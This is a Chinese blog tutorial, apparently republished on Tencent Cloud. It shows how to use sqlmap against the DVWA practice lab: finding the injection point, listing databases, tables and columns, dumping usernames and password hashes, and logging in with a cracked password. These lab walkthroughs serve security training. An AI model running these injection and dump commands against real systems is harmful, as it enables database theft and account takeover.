Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >工具使用 | sqlmap的简单使用--以DVWA为靶场

工具使用 | sqlmap的简单使用--以DVWA为靶场

作者头像
TeamsSix
发布于 2019-09-24 09:43:43
发布于 2019-09-24 09:43:43
1.8K00
代码可运行
举报
运行总次数:0
代码可运行

0x00 找到注入点

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#

0x01 利用sqlmap进行注入

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"

期间会遇到一些询问,可以自己判断是还是否,也可以一路回车,最后将会显示出靶机的一些相关信息,比如数据库版本、系统类型等

利用—dbs参数获取数据库信息

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  --dbs

利用-D指定数据库,—tables查看该数据库下所有表

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa --tables

利用-T指定表,—colums查看该表下所有列

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa -T users --columns

最后利用-C指定列,—dump进行脱裤

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa -T users -C user,password --dump

对密码的MD5值进行解密,这里以pablo用户的密码MD5值为例

0x02 利用爆出的用户名密码登陆系统

利用Sqlmap爆出的用户pablo,密码letmein进行登陆

成功登陆,关于sqlmap的用法还有很多,这里只介绍了最为常见的一种。


本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-05-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 TeamsSix 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解
本文作者:啊昊(WEB安全攻防星球学员) LOW等级 尝试正确的提交方式: 查看地址: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Sub
Ms08067安全实验室
2020/05/26
3.2K0
安全测试工具sqlmap
在周四的测试运维试听课程中,芒果给大家介绍了安全测试工具sqlmap的使用,这里我们来做个小总结。
Criss@陈磊
2019/12/05
1.7K0
安全测试工具sqlmap
Kali Linux 网络扫描秘籍 第七章 Web 应用扫描(三)
Web 应用会话通常由会话 ID 标识来维护,它由随机或伪随机值组成。出于这个原因,随机性通常是这些应用的安全的关键。这个秘籍中,我们会讨论如何使用 BurpSuite Sequencer 来收集生成的值,并测试它们的随机性。
ApacheCN_飞龙
2022/12/01
1.8K0
[红日安全]Web安全Day1 - SQL注入实战攻防
大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Python靶场基本上三种靶场全部涵盖)-实战演练(主要选择相应CMS或者是Vulnhub进行实战演练),如果对大家有帮助请Star鼓励我们创作更好文章。如果你愿意加入我们,一起完善这个项目,欢迎通过邮件形式联系我们。
红日安全
2020/02/17
1.9K0
工具使用 | Sqlmap使用详解
Sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等
谢公子
2022/01/13
6.2K0
工具使用 | Sqlmap使用详解
sqlmap的使用介绍
一、sqlmap获取目标 1.sql注入介绍 所谓SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有
XRSec
2022/02/11
2.9K0
针对一些简单场景的模糊测试
WFuzz 是开源的一款针对 web 应用模糊测试的开源软件,使用 Python 编写,测试的漏洞类型主要包括:未授权访问、注入漏洞(目录遍历、SQL 注入、XSS、XXE)、暴力破解登录口令 等。项目地址:
信安之路
2021/07/06
9290
SQLMAP--简单使用教程
‎sqlmap 是一种开源渗透测试工具,可自动检测和利用 SQL 注入缺陷并接管数据库服务器。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
用户5836910
2022/06/02
7990
SQLMAP--简单使用教程
[代码审计]DVWA代码审计档案
漏洞详情:暴力破解漏洞即我们平时所说的口令爆破(或跑字典),是采用大量的密 码进行批量猜解密码的一种恶意登录方式
天钧
2019/08/16
1.2K0
[代码审计]DVWA代码审计档案
[工具使用]SqlMap
一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:
李鹏华
2024/03/12
1750
[工具使用]SqlMap
Mysql布尔注入自动化脚本
各种原因,可能导致sqlmap跑不出来,这个时候,自己写脚本就派上用场了,这里写了个简单的脚本,脚本内容是跑user,需要可以自己改。
Jumbo
2019/05/07
1.2K0
Mysql布尔注入自动化脚本
sqlmap的浅研究
sqlmap 是一个开源的渗透测试工具,他可以自动的检测和利用SQL注入漏洞;sqlmap配置了一个强大功能的检测引擎,如果URL存在注入漏洞,它就可以从数据库中提取数据,完成注入。
Mirror王宇阳
2020/11/12
1.1K0
WEB安全学习二、注入工具 sqlmap的使用
使用的是Kali Linux 系统,系统中默认的sqlmap 是安装好了的,电脑上没有安装sqlmap,自己百度 ,需要python的环境
梅花
2020/09/28
5780
WEB安全学习二、注入工具 sqlmap的使用
SQL注入工具之SQLmap入门操作
虽然没有官方的图形化界面,但是市面上有很多个人做的图形化插件,如果实在不熟悉命令行可以考虑换成图形化插件进行使用。
测试小兵
2024/01/26
2.9K0
SQL注入工具之SQLmap入门操作
Sqlmap工具使用总结
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2022/01/24
1.3K0
Sqlmap工具使用总结
【PTE-day02 sqlmap操作】
🍇sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等.
samRsa
2023/11/17
2900
Sqlmap使用详解
Sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySQL,Oracle,Access,PostageSQL,SQL Server,IBM DB2,SQLite,Firebird,Sybase和SAP MaxDB等。
Baige
2022/03/30
4.2K0
Sqlmap使用详解
搭建dvwa环境学习从MySql注入到GetShell
是啊,在项目上的系统每周每个月经过几十遍的过滤,平时看到提交参数的地方也就sqlmap跑一跑,对于最基础的手工注入都没有扎实的学会,于是我决定要知道如何搭建环境并学会如何通过 mysql 到 getshell。
FB客服
2018/09/21
1.2K0
搭建dvwa环境学习从MySql注入到GetShell
WAF 分块传输绕过
分块传输编码(Chunked transfer encoding)是超文本传输协议(HTTP)中的一种数据传输机制,允许HTTP由应用服务器发送给客户端应用( 通常是网页浏览器)的数据可以分成多个部分。在消息头中指定Transfer-Encoding: chunked 就表示整个response将使用分块传输编码来传输内容,一个完整的消息体由n个块组成,并以最后一个大小为0的块为结束。每个非空的块包括两部分,分别为:块的长度(用十六进制表示)后面跟一个CRLF (回车及换行),长度并不包括结尾的回车换行符。第二部分就是数据本身,同样以CRLF (回车及换行)结束。最后一块是单行,只由块大小(0)以及CRLF组成,不包含任何数据。
LuckySec
2022/11/02
9440
WAF 分块传输绕过
sqlmap简单中文说明
首先下载需要的文件,如果是windows环境直接到http://sqlmap.org/下载安装所需要的文件即可。 更新 svn checkout https://svn.sqlmap.org/sql
Angel_Kitty
2018/04/08
1.5K0
相关推荐
【学员分享】基于sqlmap对DVWA靶场SQL注入进行破解
更多 >
领券
💥开发者 MCP广场重磅上线!
精选全网热门MCP server,让你的AI更好用 🚀
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验